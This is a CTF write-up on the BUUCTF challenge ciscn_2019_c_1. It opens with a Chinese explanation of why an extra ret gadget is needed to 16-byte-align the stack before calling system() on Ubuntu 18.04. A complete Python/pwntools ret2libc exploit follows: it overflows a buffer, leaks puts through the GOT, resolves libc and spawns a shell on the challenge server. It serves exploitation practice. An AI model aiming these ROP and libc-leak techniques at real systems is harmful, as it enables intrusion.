本题涉及了栈对齐问题。这个 pwn 在 Ubuntu 18 上运行，调用 system 之前需要多加 1 个 ret 来补齐栈。原因是 x86-64 SysV ABI 要求执行 call 指令时 RSP 必须 16 字节对齐，而 Ubuntu 18.04 的 glibc 中 system() 内部使用了要求 16 字节对齐的 SSE 指令（movaps），RSP 未对齐时会直接 SIGSEGV；每个 ret 会让 RSP 移动 8 字节，所以加 1 个 ret 正好把对齐修正过来。经实验再多加 4 个 ret 也可以，但这只是因为这 4 个 ret 又让 RSP 移动了 32 字节（32 mod 16 = 0），对齐状态没有改变；由此不能推出对齐是 32 字节，实际要求是 16 字节对齐（加 1 个和加 5 个 ret 都满足，加 0 个或加 2 个则不满足）。
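"""ret2libc exploit for ciscn_2019_c_1 (BUUCTF), with the x86-64 stack-alignment fix.

Stage 1 overflows encrypt()'s stack buffer, calls puts(puts@GOT) to leak a
libc address and returns into encrypt() for a second overflow.  Stage 2
returns into system("/bin/sh").

Why the extra `ret` gadgets: the SysV AMD64 ABI requires RSP to be 16-byte
aligned at a call instruction, and glibc's system() on Ubuntu 18.04 executes
aligned SSE stores (movaps) that SIGSEGV when that is violated.  Each `ret`
pops 8 bytes, so one `ret` fixes the parity; adding four more moves RSP by a
further 32 bytes, which keeps the same alignment mod 16 -- the requirement is
16 bytes, not 32.
"""
import struct
import sys

# Gadget and symbol addresses in the (non-PIE) target binary.
POP_RDI = 0x0000000000400c83       # pop rdi ; ret
PUTS_GOT = 0x602020                # puts@GOT, read to leak the libc address
PUTS_PLT = 0x4006e0                # puts@PLT, the call used for the leak
ENCRYPT_SYM = 0x4009A0             # encrypt(), re-entered for the second overflow
RET = 0x4006b9                     # bare `ret`, used only to realign RSP

# 0x50 bytes of filler up to the saved rbp, then 8 bytes overwriting it.
# The zero qword also acts as a NUL terminator, so the program's character
# transformation loop stops before it reaches the ROP chain
# (NOTE(review): inferred from the payload layout; confirm against encrypt()).
PADDING = b'0' * 0x50 + struct.pack('<Q', 0)

TARGET_HOST = "node3.buuoj.cn"
TARGET_PORT = 28578
LOCAL_BINARY = "./ciscn_2019_c_1"


def p64(value: int) -> bytes:
    """Pack *value* as 8 little-endian bytes (same as pwntools' p64 on amd64)."""
    return struct.pack('<Q', value)


def build_payload(*chain: int) -> bytes:
    """Return PADDING followed by the packed ROP chain (one qword per gadget/argument)."""
    return PADDING + b''.join(p64(addr) for addr in chain)


def parse_leak(line: bytes) -> int:
    """Convert the line puts() printed for puts@GOT into an integer address.

    puts() writes the GOT entry up to its first NUL byte, so at most 6
    significant bytes arrive, followed by the newline puts appends.  Only that
    trailing newline is stripped: whitespace bytes such as 0x20 or 0x09 are
    perfectly valid address bytes, and splitting on whitespace (the usual
    one-liner) silently truncates the leak whenever one occurs.  A lowest
    address byte equal to 0x0a cannot be recovered by any line-based read;
    rerunning the exploit is the practical workaround.

    Raises ValueError if the line is empty or longer than a qword.
    """
    raw = line.rstrip(b'\n')
    if not raw or len(raw) > 8:
        raise ValueError(f"unexpected leak line: {line!r}")
    return struct.unpack('<Q', raw.ljust(8, b'\x00'))[0]


def main(remote_target: bool = False) -> None:
    """Run the two-stage exploit against the local binary (default) or the remote service."""
    from pwn import context, process, remote
    from LibcSearcher import LibcSearcher

    context.log_level = "debug"
    context(arch="amd64", os="linux")

    if remote_target:
        p = remote(TARGET_HOST, TARGET_PORT)
    else:
        p = process(LOCAL_BINARY)

    # Stage 1: menu option 1, then overflow -> puts(puts@GOT) -> back into encrypt().
    p.sendline(b"1")
    p.sendline(build_payload(POP_RDI, PUTS_GOT, PUTS_PLT, ENCRYPT_SYM))
    p.recvuntil(b"Ciphertext\n")
    p.recvuntil(b"\n")
    puts_addr = parse_leak(p.recvuntil(b"\n"))
    print(hex(puts_addr))

    libc = LibcSearcher("puts", puts_addr)
    libc_base = puts_addr - libc.dump("puts")
    # libc is mapped page-aligned; a misaligned base means the wrong libc build was chosen.
    if libc_base & 0xfff:
        raise RuntimeError(f"libc base {libc_base:#x} is not page aligned; wrong libc candidate")
    system_addr = libc_base + libc.dump("system")
    bin_sh_addr = libc_base + libc.dump("str_bin_sh")

    # Stage 2: realign RSP with `ret` gadgets, then system("/bin/sh").
    # One RET is sufficient (it shifts RSP by 8 bytes); the remaining four
    # shift it by another 32 bytes and may be dropped -- they only demonstrate
    # that 16-byte alignment is preserved.
    p.sendline(build_payload(RET, RET, RET, RET, RET, POP_RDI, bin_sh_addr, system_addr))
    p.interactive()


if __name__ == "__main__":
    main(remote_target="remote" in sys.argv[1:])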